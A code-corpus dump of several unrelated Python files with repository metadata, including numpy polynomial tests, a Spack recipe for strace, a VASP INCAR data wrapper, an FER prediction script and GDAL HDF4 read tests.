b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/model_groups/mg_c011_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/model_groups/mg_c011_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from output.models.ms_data.model_groups.mg_c011_xsd.mg_c011 import Test
__all__ = [
"Test",
]
| 16.5
| 71
| 0.747475
|
4a11092e8bb834b3f8c9f5e5c7b667cfbb10b2dd
| 1,066
|
py
|
Python
|
python/sprint_12/tmp/test.py
|
Talgatovich/algorithms-templates
|
e7c6fd71451304ed0dacc393c3f30ca3f5282d46
|
[
"MIT"
] | null | null | null |
python/sprint_12/tmp/test.py
|
Talgatovich/algorithms-templates
|
e7c6fd71451304ed0dacc393c3f30ca3f5282d46
|
[
"MIT"
] | null | null | null |
python/sprint_12/tmp/test.py
|
Talgatovich/algorithms-templates
|
e7c6fd71451304ed0dacc393c3f30ca3f5282d46
|
[
"MIT"
] | null | null | null |
# class Node:
# def __init__(self, value, next_item=None):
# self.value = value
# self.next_item = next_item
#
#
# def define_my_define(node):
# while node:
# print(node.value)
# node = node.next_item
def get_node_by_index(node, index):
while index:
node = node.next_item
index -= 1
return node
def solution(head, index):
if index == 0:
following_node = get_node_by_index(head, index + 1)
return following_node
previous_node = get_node_by_index(head, index - 1)
following_node = get_node_by_index(head, index + 1)
previous_node.next_item = following_node
return head
def test():
node4 = Node("node4!", None)
node3 = Node("node3", node4)
node2 = Node("node2", node3)
new_node = Node("new node MF!!!", node2)
node1 = Node("node1", new_node)
node0 = Node("node0", node1)
node00 = Node("node00", node0)
index = 3
value = "NEWWEST NODE!!!!"
a = solution(node00, index)
res = define_my_define(a)
return res
print(test())
| 22.680851
| 59
| 0.619137
|
4a110c228cce4bf1775db65c76bb3e408071cc0d
| 3,330
|
py
|
Python
|
predict.py
|
vkso/FER
|
b7207341139ff451753a4c4640530e915673fc7c
|
[
"Apache-2.0"
] | null | null | null |
predict.py
|
vkso/FER
|
b7207341139ff451753a4c4640530e915673fc7c
|
[
"Apache-2.0"
] | null | null | null |
predict.py
|
vkso/FER
|
b7207341139ff451753a4c4640530e915673fc7c
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
from customParameters import *
import myMethod as myMethod
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sn
import argparse
# use method:
# python predict.py --model myModel --type whole_history_epoch
# python predict.py --model myVGG --type whole --load_path /Users/wyc/Downloads/cp-0560.ckpt
# python predict.py --model myModel --type whole_history_epoch --train_name withoutFirstBN --total_epoch 171
parser = argparse.ArgumentParser(description='predicted with confusion matrix')
parser.add_argument('--model', type=str, default='myModel')
parser.add_argument('--type', type=str, default='whole')
parser.add_argument('--load_path', type=str)
parser.add_argument('--train_name', type=str, default='newTrain')
parser.add_argument('--total_epoch', type=int, default=600)
# parser.add_argument('--gpus', type=int, default=1)
args = parser.parse_args()
max_epoch = args.total_epoch
test_private_path = "./data/FER2013/private_test.csv"
private_test_data = myMethod.get_dataset_test(test_private_path)
private_test_data = private_test_data.map(myMethod.preprocess_DAtestdata)
# get standard result
correct_answer = np.loadtxt(test_private_path, dtype=np.int, delimiter=',',
skiprows=1, usecols=(0), encoding='utf-8')
# correct_answer = correct_answer.repeat(10)
if args.model == 'myVGG':
model = myMethod.create_myVGG()
else:
model = myMethod.create_myModel()
model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=["accuracy"])
def get_acc_predict(load_path):
model.load_weights(load_path)
x = model.predict(private_test_data,
steps=TOTAL_TEST // BATCH_SIZE_TEST_DA)
predict_result = np.zeros(shape=(3589, 7))
for i in range(0, 3589):
sum = np.zeros(shape=(1, 7))
for j in range(0, 10):
sum += x[10 * i + j]
predict_result[i] = sum
y = np.argmax(predict_result, axis=1)
z = y - correct_answer
sum = np.sum(z == 0)
print('sum: {}'.format(sum))
print('acc: {}'.format(sum / 3589))
return y
def get_history_acc(testname):
max_acc = 0
best_epoch = 0
for epoch in range(10, max_epoch, 10):
load_path = "./train_history/" + testname + '/cp-' + str(epoch).zfill(4) + '.ckpt'
model.load_weights(load_path)
x = model.predict(private_test_data,
steps=TOTAL_TEST // BATCH_SIZE_TEST_DA)
predict_result = np.zeros(shape=(3589, 7))
for i in range(0, 3589):
sum = np.zeros(shape=(1, 7))
for j in range(0, 10):
sum += x[10 * i + j]
predict_result[i] = sum
y = np.argmax(predict_result, axis=1)
z = y - correct_answer
sum = np.sum(z == 0)
if sum / 3589 > max_acc:
max_acc = sum / 3589
best_epoch = epoch
print('epoch: {}, correct num: {}, acc: {}'.format(epoch,sum, sum/3589))
print('epoch: {} -> max acc: {}'.format(best_epoch, max_acc))
if args.type == 'whole':
load_path = args.load_path
y = get_acc_predict(load_path)
myMethod.plot_heat_map(y, correct_answer)
if args.type == 'whole_history_epoch':
testname = args.train_name
get_history_acc(testname)
| 32.970297
| 108
| 0.653453
|
4a110c92bbf52c4de802673121f891dc7dd5e33f
| 1,080
|
py
|
Python
|
OtenkiBuzzer/Sensor.py
|
kentaro/otenki-buzzer
|
be007d7859770bc1b90c0b9cd9080e88aef11ad0
|
[
"MIT"
] | 3
|
2016-06-14T10:18:54.000Z
|
2016-06-14T10:30:44.000Z
|
OtenkiBuzzer/Sensor.py
|
kentaro/otenki-buzzer
|
be007d7859770bc1b90c0b9cd9080e88aef11ad0
|
[
"MIT"
] | null | null | null |
OtenkiBuzzer/Sensor.py
|
kentaro/otenki-buzzer
|
be007d7859770bc1b90c0b9cd9080e88aef11ad0
|
[
"MIT"
] | null | null | null |
import time, wiringpi as pi
SPI_CH = 0
READ_CH = 0
class Sensor:
def __init__(self):
pi.wiringPiSPISetup(SPI_CH, 1000000)
def check(self):
buffer = 0x6800 | (0x1800 * READ_CH)
buffer = buffer.to_bytes(2, byteorder='big')
pi.wiringPiSPIDataRW(SPI_CH, buffer)
value = (buffer[0] * 256 + buffer[1]) & 0x3ff
volt = value * 3.3 / 1034
distance = self.gp2y0a21(volt)
return distance
def gp2y0a21(self, volt):
if volt >= 2.25:
length = (volt - 4.625) / -0.2375
elif volt < 2.25 and volt >= 1.7:
length = (volt - 3.35) / -0.11
elif volt < 1.7 and volt >= 1.3:
length = (volt - 2.9) / -0.08
elif volt < 1.3 and volt >= 0.9:
length = (volt - 2.1) / -0.04
elif volt < 0.9 and volt >= 0.6:
length = (volt - 1.35) / -0.015
elif volt < 0.6 and volt >= 0.5:
length = (volt - 1.1) / -0.01
elif volt < 0.5:
length = (volt - 0.8) / -0.005
return length
| 28.421053
| 56
| 0.494444
|
4a110d58eef0a709843b9add5d07897ae67548d4
| 4,561
|
py
|
Python
|
numpy/lib/tests/test_polynomial.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/lib/tests/test_polynomial.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/lib/tests/test_polynomial.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division, absolute_import
'''
>>> p = np.poly1d([1.,2,3])
>>> p
poly1d([ 1., 2., 3.])
>>> print(p)
2
1 x + 2 x + 3
>>> q = np.poly1d([3.,2,1])
>>> q
poly1d([ 3., 2., 1.])
>>> print(q)
2
3 x + 2 x + 1
>>> print(np.poly1d([1.89999+2j, -3j, -5.12345678, 2+1j]))
3 2
(1.9 + 2j) x - 3j x - 5.123 x + (2 + 1j)
>>> print(np.poly1d([-3, -2, -1]))
2
-3 x - 2 x - 1
>>> p(0)
3.0
>>> p(5)
38.0
>>> q(0)
1.0
>>> q(5)
86.0
>>> p * q
poly1d([ 3., 8., 14., 8., 3.])
>>> p / q
(poly1d([ 0.33333333]), poly1d([ 1.33333333, 2.66666667]))
>>> p + q
poly1d([ 4., 4., 4.])
>>> p - q
poly1d([-2., 0., 2.])
>>> p ** 4
poly1d([ 1., 8., 36., 104., 214., 312., 324., 216., 81.])
>>> p(q)
poly1d([ 9., 12., 16., 8., 6.])
>>> q(p)
poly1d([ 3., 12., 32., 40., 34.])
>>> np.asarray(p)
array([ 1., 2., 3.])
>>> len(p)
2
>>> p[0], p[1], p[2], p[3]
(3.0, 2.0, 1.0, 0)
>>> p.integ()
poly1d([ 0.33333333, 1. , 3. , 0. ])
>>> p.integ(1)
poly1d([ 0.33333333, 1. , 3. , 0. ])
>>> p.integ(5)
poly1d([ 0.00039683, 0.00277778, 0.025 , 0. , 0. ,
0. , 0. , 0. ])
>>> p.deriv()
poly1d([ 2., 2.])
>>> p.deriv(2)
poly1d([ 2.])
>>> q = np.poly1d([1.,2,3], variable='y')
>>> print(q)
2
1 y + 2 y + 3
>>> q = np.poly1d([1.,2,3], variable='lambda')
>>> print(q)
2
1 lambda + 2 lambda + 3
>>> np.polydiv(np.poly1d([1,0,-1]), np.poly1d([1,1]))
(poly1d([ 1., -1.]), poly1d([ 0.]))
'''
from numpy.testing import *
import numpy as np
class TestDocs(TestCase):
def test_doctests(self):
return rundocs()
def test_roots(self):
assert_array_equal(np.roots([1,0,0]), [0,0])
def test_str_leading_zeros(self):
p = np.poly1d([4,3,2,1])
p[3] = 0
assert_equal(str(p),
" 2\n"
"3 x + 2 x + 1")
p = np.poly1d([1,2])
p[0] = 0
p[1] = 0
assert_equal(str(p), " \n0")
def test_polyfit(self) :
c = np.array([3., 2., 1.])
x = np.linspace(0,2,7)
y = np.polyval(c,x)
err = [1,-1,1,-1,1,-1,1]
weights = np.arange(8,1,-1)**2/7.0
# check 1D case
m, cov = np.polyfit(x,y+err,2,cov=True)
est = [3.8571, 0.2857, 1.619]
assert_almost_equal(est, m, decimal=4)
val0 = [[2.9388, -5.8776, 1.6327],
[-5.8776, 12.7347, -4.2449],
[1.6327, -4.2449, 2.3220]]
assert_almost_equal(val0, cov, decimal=4)
m2, cov2 = np.polyfit(x,y+err,2,w=weights,cov=True)
assert_almost_equal([4.8927, -1.0177, 1.7768], m2, decimal=4)
val = [[ 8.7929, -10.0103, 0.9756],
[-10.0103, 13.6134, -1.8178],
[ 0.9756, -1.8178, 0.6674]]
assert_almost_equal(val, cov2, decimal=4)
# check 2D (n,1) case
y = y[:,np.newaxis]
c = c[:,np.newaxis]
assert_almost_equal(c, np.polyfit(x,y,2))
# check 2D (n,2) case
yy = np.concatenate((y,y), axis=1)
cc = np.concatenate((c,c), axis=1)
assert_almost_equal(cc, np.polyfit(x,yy,2))
m, cov = np.polyfit(x,yy + np.array(err)[:,np.newaxis],2,cov=True)
assert_almost_equal(est, m[:,0], decimal=4)
assert_almost_equal(est, m[:,1], decimal=4)
assert_almost_equal(val0, cov[:,:,0], decimal=4)
assert_almost_equal(val0, cov[:,:,1], decimal=4)
def test_objects(self):
from decimal import Decimal
p = np.poly1d([Decimal('4.0'), Decimal('3.0'), Decimal('2.0')])
p2 = p * Decimal('1.333333333333333')
assert_(p2[1] == Decimal("3.9999999999999990"))
p2 = p.deriv()
assert_(p2[1] == Decimal('8.0'))
p2 = p.integ()
assert_(p2[3] == Decimal("1.333333333333333333333333333"))
assert_(p2[2] == Decimal('1.5'))
assert_(np.issubdtype(p2.coeffs.dtype, np.object_))
def test_complex(self):
p = np.poly1d([3j, 2j, 1j])
p2 = p.integ()
assert_((p2.coeffs == [1j,1j,1j,0]).all())
p2 = p.deriv()
assert_((p2.coeffs == [6j,2j]).all())
def test_integ_coeffs(self):
p = np.poly1d([3,2,1])
p2 = p.integ(3, k=[9,7,6])
assert_((p2.coeffs == [1/4./5.,1/3./4.,1/2./3.,9/1./2.,7,6]).all())
def test_zero_dims(self):
try:
np.poly(np.zeros((0, 0)))
except ValueError:
pass
if __name__ == "__main__":
run_module_suite()
| 26.364162
| 75
| 0.475773
|
4a110d7c33f33f92237a37f23b997faf93ae4797
| 3,765
|
py
|
Python
|
aiida_cusp/data/inputs/vasp_incar.py
|
astamminger/aiida_cusp
|
4a5a014fc90761ee8855cbe6305a8f565f9626a3
|
[
"MIT"
] | 2
|
2020-08-10T15:47:10.000Z
|
2022-03-14T12:29:43.000Z
|
aiida_cusp/data/inputs/vasp_incar.py
|
astamminger/aiida_cusp
|
4a5a014fc90761ee8855cbe6305a8f565f9626a3
|
[
"MIT"
] | 13
|
2020-07-10T16:22:05.000Z
|
2022-02-28T18:41:53.000Z
|
aiida_cusp/data/inputs/vasp_incar.py
|
astamminger/aiida_cusp
|
4a5a014fc90761ee8855cbe6305a8f565f9626a3
|
[
"MIT"
] | 2
|
2020-07-09T10:09:04.000Z
|
2020-08-10T15:47:54.000Z
|
# -*- coding: utf-8 -*-
"""
Datatype and methods to initialize and interact with VASP specific INCAR
input data
"""
from aiida.orm import Dict
from pymatgen.io.vasp.inputs import Incar
from aiida_cusp.utils.exceptions import IncarWrapperError
class VaspIncarData(Dict):
"""
VaspIncarData(incar=None)
AiiDA compatible node representing a VASP incar data object based on the
:class:`~pymatgen.io.vasp.inputs.Incar` datatype.
:param incar: input parameters used to construct the
:class:`~pymatgen.io.vasp.inputs.Incar` object or a incar object
itself (Note: may also be set to `None` to initialize an empty incar
object and use the VASP default parameters)
:type incar: dict or :class:`~pymatgen.io.vasp.inputs.Incar`
"""
def __init__(self, *args, **kwargs):
# if incar is set: assume initialization from user space. Cannot
# use None here since it is a valid value for incar
incar = kwargs.pop('incar', False)
if not incar:
super(VaspIncarData, self).__init__(*args, **kwargs)
else: # redirect to wrapper if incar is set
incar = IncarWrapper(incar=incar)
super(VaspIncarData, self).__init__(dict=incar.as_dict())
def get_incar(self):
"""
get_incar()
Create and return a :class:`~pymatgen.io.vasp.inputs.Incar` instance
initialized from the node's stored incar data contents.
:return: a pymatgen Incar data instance
:rtype: :class:`pymatgen.io.vasp.inputs.Incar`
"""
return Incar.from_dict(self.get_dict())
def write_file(self, filename):
"""
write_file(filename)
Write the stored incar data to VASP input file.
Output of the contents to the file is redirected to the
:meth:`pymatgen.io.vasp.inputs.Incar.write_file` method and the created
output file will be formatted as VASP input file (INCAR)
:param filename: destination for writing the output file
:type filename: str
:return: None
"""
incar = self.get_incar()
incar.write_file(filename)
class IncarWrapper(object):
"""
Utility class for initializing :class:`pymatgen.io.vasp.inputs.Incar`
data objects
Accepts either a :class:`~pymatgen.io.vasp.inputs.Incar` instance or
a dictionary containing valid VASP Incar parameters which will be passed
through to the :class:`~pymatgen.io.vasp.inputs.Incar` constructor. Note:
If `incar` is set to `None` and empty incar file will be initialized.
:param incar: input parameters used to construct the
:class:`~pymatgen.io.vasp.inputs.Incar` object or a incar object
itself.
:type incar: dict or :class:`~pymatgen.io.vasp.inputs.Incar`
"""
def __new__(cls, incar=None):
# check if already pymatgen Incar instance
if isinstance(incar, Incar):
return incar
elif isinstance(incar, dict): # initialize from user input
incar_params_upper = cls.keys_to_upper_case(incar)
incar_data = Incar(params=incar_params_upper)
elif incar is None:
incar_data = Incar(params=None)
else:
raise IncarWrapperError("Unknown type '{}' for incar parameters"
.format(type(incar)))
return incar_data
@classmethod
def keys_to_upper_case(cls, rawdict):
"""
Transform all incar parameter keys to upper case
:param rawdict: input dictionary containing incar parameter key
value pairs with keys possibly of mixed case
:type rawdict: dict
"""
return {key.upper(): value for (key, value) in rawdict.items()}
| 34.541284
| 79
| 0.652855
|
4a11101663c7ba1612b1169eef3c997f8773c2b5
| 2,264
|
py
|
Python
|
var/spack/repos/builtin/packages/strace/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 3
|
2021-09-29T02:14:40.000Z
|
2022-01-27T20:50:36.000Z
|
var/spack/repos/builtin/packages/strace/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8
|
2022-02-28T11:30:18.000Z
|
2022-03-23T19:34:56.000Z
|
var/spack/repos/builtin/packages/strace/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Strace(AutotoolsPackage):
"""Strace is a diagnostic, debugging and instructional userspace
utility for Linux. It is used to monitor and tamper with interactions
between processes and the Linux kernel, which include system calls,
signal deliveries, and changes of process state."""
homepage = "https://strace.io"
url = "https://github.com/strace/strace/releases/download/v5.2/strace-5.2.tar.xz"
conflicts('platform=darwin', msg='strace runs only on Linux.')
version('5.12', sha256='29171edf9d252f89c988a4c340dfdec662f458cb8c63d85431d64bab5911e7c4')
version('5.11', sha256='ffe340b10c145a0f85734271e9cce56457d23f21a7ea5931ab32f8cf4e793879')
version('5.10', sha256='fe3982ea4cd9aeb3b4ba35f6279f0b577a37175d3282be24b9a5537b56b8f01c')
version('5.9', sha256='39473eb8465546c3e940fb663cb381eba5613160c7302794699d194a4d5d66d9')
version('5.8', sha256='df4a669f7fff9cc302784085bd4b72fab216a426a3f72c892b28a537b71e7aa9')
version('5.7', sha256='b284b59f9bcd95b9728cea5bd5c0edc5ebe360af73dc76fbf6334f11c777ccd8')
version('5.6', sha256='189968eeae06ed9e20166ec55a830943c84374676a457c9fe010edc7541f1b01')
version('5.5', sha256='9f58958c8e59ea62293d907d10572e352b582bd7948ed21aa28ebb47e5bf30ff')
version('5.4', sha256='f7d00514d51290b6db78ad7a9de709baf93caa5981498924cbc9a744cfd2a741')
version('5.3', sha256='6c131198749656401fe3efd6b4b16a07ea867e8f530867ceae8930bbc937a047')
version('5.2', sha256='d513bc085609a9afd64faf2ce71deb95b96faf46cd7bc86048bc655e4e4c24d2')
version('5.1', sha256='f5a341b97d7da88ee3760626872a4899bf23cf8dee56901f114be5b1837a9a8b')
version('5.0', sha256='3b7ad77eb2b81dc6078046a9cc56eed5242b67b63748e7fc28f7c2daf4e647da')
version('4.21', sha256='5c7688db44073e94c59a5627744e5699454419824cc8166e8bcfd7ec58375c37')
def configure_args(self):
args = []
if self.spec.target.family == 'aarch64':
args.append('--enable-mpers=no')
else:
args.append('--enable-mpers=yes')
return args
| 53.904762
| 94
| 0.775618
|
4a11108912943852c129708f7045c665a5e86791
| 10,978
|
py
|
Python
|
autotest/gcore/hdf4_read.py
|
ajolma/gdal
|
19d847c8519919fcd1e7e7247644d28771034317
|
[
"MIT"
] | 1
|
2018-12-19T14:08:20.000Z
|
2018-12-19T14:08:20.000Z
|
autotest/gcore/hdf4_read.py
|
ajolma/gdal
|
19d847c8519919fcd1e7e7247644d28771034317
|
[
"MIT"
] | null | null | null |
autotest/gcore/hdf4_read.py
|
ajolma/gdal
|
19d847c8519919fcd1e7e7247644d28771034317
|
[
"MIT"
] | 1
|
2019-11-01T15:17:09.000Z
|
2019-11-01T15:17:09.000Z
|
#!/usr/bin/env pytest
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test basic read support for a all datatypes from a HDF file.
# Author: Andrey Kiselev, dron@remotesensing.org
#
###############################################################################
# Copyright (c) 2003, Andrey Kiselev <dron@remotesensing.org>
# Copyright (c) 2009-2012, Even Rouault <even dot rouault at mines-paris dot org>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
###############################################################################
import pytest
import gdaltest
from osgeo import gdal
init_list = [
('byte_3.hdf', 4672),
('int16_3.hdf', 4672),
('uint16_3.hdf', 4672),
('int32_3.hdf', 4672),
('uint32_3.hdf', 4672),
('float32_3.hdf', 4672),
('float64_3.hdf', 4672),
('utmsmall_3.hdf', 50054),
('byte_2.hdf', 4672),
('int16_2.hdf', 4672),
('uint16_2.hdf', 4672),
('int32_2.hdf', 4672),
('uint32_2.hdf', 4672),
('float32_2.hdf', 4672),
('float64_2.hdf', 4672),
('utmsmall_2.hdf', 50054)]
@pytest.mark.parametrize(
'filename,checksum',
init_list,
ids=[tup[0].split('.')[0] for tup in init_list],
)
@pytest.mark.require_driver('HDF4Image')
def test_hdf4_open(filename, checksum):
ut = gdaltest.GDALTest('HDF4Image', filename, 1, checksum)
ut.testOpen()
###############################################################################
# Test HDF4_SDS with single subdataset
def test_hdf4_read_online_1():
gdaltest.hdf4_drv = gdal.GetDriverByName('HDF4')
if gdaltest.hdf4_drv is None:
pytest.skip()
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/A2004259075000.L2_LAC_SST.hdf', 'A2004259075000.L2_LAC_SST.hdf'):
pytest.skip()
tst = gdaltest.GDALTest('HDF4Image', 'tmp/cache/A2004259075000.L2_LAC_SST.hdf', 1, 28189, filename_absolute=1)
return tst.testOpen()
###############################################################################
# Test HDF4_SDS with GEOLOCATION info
def test_hdf4_read_online_2():
if gdaltest.hdf4_drv is None:
pytest.skip()
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/A2006005182000.L2_LAC_SST.x.hdf', 'A2006005182000.L2_LAC_SST.x.hdf'):
pytest.skip()
tst = gdaltest.GDALTest('HDF4Image', 'HDF4_SDS:UNKNOWN:"tmp/cache/A2006005182000.L2_LAC_SST.x.hdf":13', 1, 13209, filename_absolute=1)
tst.testOpen()
ds = gdal.Open('HDF4_SDS:UNKNOWN:"tmp/cache/A2006005182000.L2_LAC_SST.x.hdf":13')
md = ds.GetMetadata('GEOLOCATION')
ds = None
assert md['X_DATASET'] == 'HDF4_SDS:UNKNOWN:"tmp/cache/A2006005182000.L2_LAC_SST.x.hdf":11', \
'Did not get expected X_DATASET'
###############################################################################
# Test HDF4_EOS:EOS_GRID
def test_hdf4_read_online_3():
if gdaltest.hdf4_drv is None:
pytest.skip()
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/MO36MW14.chlor_MODIS.ADD2001089.004.2002186190207.hdf', 'MO36MW14.chlor_MODIS.ADD2001089.004.2002186190207.hdf'):
pytest.skip()
tst = gdaltest.GDALTest('HDF4Image', 'tmp/cache/MO36MW14.chlor_MODIS.ADD2001089.004.2002186190207.hdf', 1, 34723, filename_absolute=1)
tst.testOpen()
ds = gdal.Open('tmp/cache/MO36MW14.chlor_MODIS.ADD2001089.004.2002186190207.hdf')
gt = ds.GetGeoTransform()
expected_gt = [-180.0, 0.3515625, 0.0, 90.0, 0.0, -0.3515625]
for i in range(6):
assert abs(gt[i] - expected_gt[i]) <= 1e-8, 'did not get expected gt'
srs = ds.GetProjectionRef()
assert srs.find('Clarke') != -1, 'did not get expected projection'
ds = None
###############################################################################
# Test HDF4_SDS:SEAWIFS_L1A
def test_hdf4_read_online_4():
if gdaltest.hdf4_drv is None:
pytest.skip()
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/S2002196124536.L1A_HDUN.BartonBendish.extract.hdf', 'S2002196124536.L1A_HDUN.BartonBendish.extract.hdf'):
pytest.skip()
tst = gdaltest.GDALTest('HDF4Image', 'tmp/cache/S2002196124536.L1A_HDUN.BartonBendish.extract.hdf', 1, 33112, filename_absolute=1)
tst.testOpen()
ds = gdal.Open('tmp/cache/S2002196124536.L1A_HDUN.BartonBendish.extract.hdf')
assert ds.RasterCount == 8, 'did not get expected band number'
ds = None
###############################################################################
# Test fix for #2208
def test_hdf4_read_online_5():
if gdaltest.hdf4_drv is None:
pytest.skip()
# 13 MB
if not gdaltest.download_file('ftp://data.nodc.noaa.gov/pub/data.nodc/pathfinder/Version5.0/Monthly/1991/199101.s04m1pfv50-sst-16b.hdf', '199101.s04m1pfv50-sst-16b.hdf'):
pytest.skip()
tst = gdaltest.GDALTest('HDF4Image', 'tmp/cache/199101.s04m1pfv50-sst-16b.hdf', 1, 41173, filename_absolute=1)
tst.testOpen()
###############################################################################
# Test fix for #3386 where block size is dataset size
def test_hdf4_read_online_6():
if gdaltest.hdf4_drv is None:
pytest.skip()
# 1 MB
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/MOD09Q1G_EVI.A2006233.h07v03.005.2008338190308.hdf', 'MOD09Q1G_EVI.A2006233.h07v03.005.2008338190308.hdf'):
pytest.skip()
# Test with quoting of components
tst = gdaltest.GDALTest('HDF4Image', 'HDF4_EOS:EOS_GRID:"tmp/cache/MOD09Q1G_EVI.A2006233.h07v03.005.2008338190308.hdf":"MODIS_NACP_EVI":"MODIS_EVI"', 1, 12197, filename_absolute=1)
tst.testOpen()
ds = gdal.Open('HDF4_EOS:EOS_GRID:tmp/cache/MOD09Q1G_EVI.A2006233.h07v03.005.2008338190308.hdf:MODIS_NACP_EVI:MODIS_EVI')
if 'GetBlockSize' in dir(gdal.Band):
(blockx, blocky) = ds.GetRasterBand(1).GetBlockSize()
assert blockx == 4800 and blocky == 4800, "Did not get expected block size"
cs = ds.GetRasterBand(1).Checksum()
assert cs == 12197, 'did not get expected checksum'
ds = None
###############################################################################
# Test fix for #3386 where block size is smaller than dataset size
def test_hdf4_read_online_7():
if gdaltest.hdf4_drv is None:
pytest.skip()
# 4 MB
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/MOD09A1.A2010041.h06v03.005.2010051001103.hdf', 'MOD09A1.A2010041.h06v03.005.2010051001103.hdf'):
pytest.skip()
tst = gdaltest.GDALTest('HDF4Image', 'HDF4_EOS:EOS_GRID:tmp/cache/MOD09A1.A2010041.h06v03.005.2010051001103.hdf:MOD_Grid_500m_Surface_Reflectance:sur_refl_b01', 1, 54894, filename_absolute=1)
tst.testOpen()
ds = gdal.Open('HDF4_EOS:EOS_GRID:tmp/cache/MOD09A1.A2010041.h06v03.005.2010051001103.hdf:MOD_Grid_500m_Surface_Reflectance:sur_refl_b01')
if 'GetBlockSize' in dir(gdal.Band):
(blockx, blocky) = ds.GetRasterBand(1).GetBlockSize()
assert blockx == 2400 and blocky == 32, "Did not get expected block size"
cs = ds.GetRasterBand(1).Checksum()
assert cs == 54894, 'did not get expected checksum'
ds = None
###############################################################################
# Test reading a HDF4_EOS:EOS_GRID where preferred block height reported would be 1
# but that will lead to very poor performance (#3386)
def test_hdf4_read_online_8():
if gdaltest.hdf4_drv is None:
pytest.skip()
# 5 MB
if not gdaltest.download_file('ftp://e4ftl01u.ecs.nasa.gov/MODIS_Composites/MOLT/MOD13Q1.005/2006.06.10/MOD13Q1.A2006161.h21v13.005.2008234103220.hdf', 'MOD13Q1.A2006161.h21v13.005.2008234103220.hdf'):
pytest.skip()
tst = gdaltest.GDALTest('HDF4Image', 'HDF4_EOS:EOS_GRID:tmp/cache/MOD13Q1.A2006161.h21v13.005.2008234103220.hdf:MODIS_Grid_16DAY_250m_500m_VI:250m 16 days NDVI', 1, 53837, filename_absolute=1)
tst.testOpen()
ds = gdal.Open('HDF4_EOS:EOS_GRID:tmp/cache/MOD13Q1.A2006161.h21v13.005.2008234103220.hdf:MODIS_Grid_16DAY_250m_500m_VI:250m 16 days NDVI')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 53837, 'did not get expected checksum'
if 'GetBlockSize' in dir(gdal.Band):
(blockx, blocky) = ds.GetRasterBand(1).GetBlockSize()
if blockx != 4800 or blocky == 1:
print('blockx=%d, blocky=%d' % (blockx, blocky))
pytest.fail("Did not get expected block size")
ds = None
###############################################################################
# Test reading L1G MTL metadata metadata
def test_hdf4_read_online_9():
if gdaltest.hdf4_drv is None:
pytest.skip()
if not gdaltest.download_file('http://www.geogratis.cgdi.gc.ca/download/landsat_7/hdf/L71002025_02520010722/L71002025_02520010722_MTL.L1G', 'L71002025_02520010722_MTL.L1G'):
pytest.skip()
if not gdaltest.download_file('http://www.geogratis.cgdi.gc.ca/download/landsat_7/hdf/L71002025_02520010722/L71002025_02520010722_HDF.L1G', 'L71002025_02520010722_HDF.L1G'):
pytest.skip()
f = open('tmp/cache/L71002025_02520010722_B10.L1G', 'wb')
f.close()
ds = gdal.Open('HDF4_SDS:UNKNOWN:"tmp/cache/L71002025_02520010722_HDF.L1G":0')
gcp_count = ds.GetGCPCount()
ds = None
assert gcp_count == 4, 'did not get expected gcp count'
###############################################################################
# Test that non-tiled access works (#4672)
def test_hdf4_read_online_10():
if gdaltest.hdf4_drv is None:
pytest.skip()
if not gdaltest.download_file('http://trac.osgeo.org/gdal/raw-attachment/ticket/4672/MOD16A2.A2000M01.h14v02.105.2010357183410.hdf', 'MOD16A2.A2000M01.h14v02.105.2010357183410.hdf'):
pytest.skip()
ds = gdal.Open('HDF4_EOS:EOS_GRID:"tmp/cache/MOD16A2.A2000M01.h14v02.105.2010357183410.hdf":MOD_Grid_MOD16A2:ET_1km')
if 'GetBlockSize' in dir(gdal.Band):
(blockx, blocky) = ds.GetRasterBand(1).GetBlockSize()
assert blockx == 1200 and blocky == 833, "Did not get expected block size"
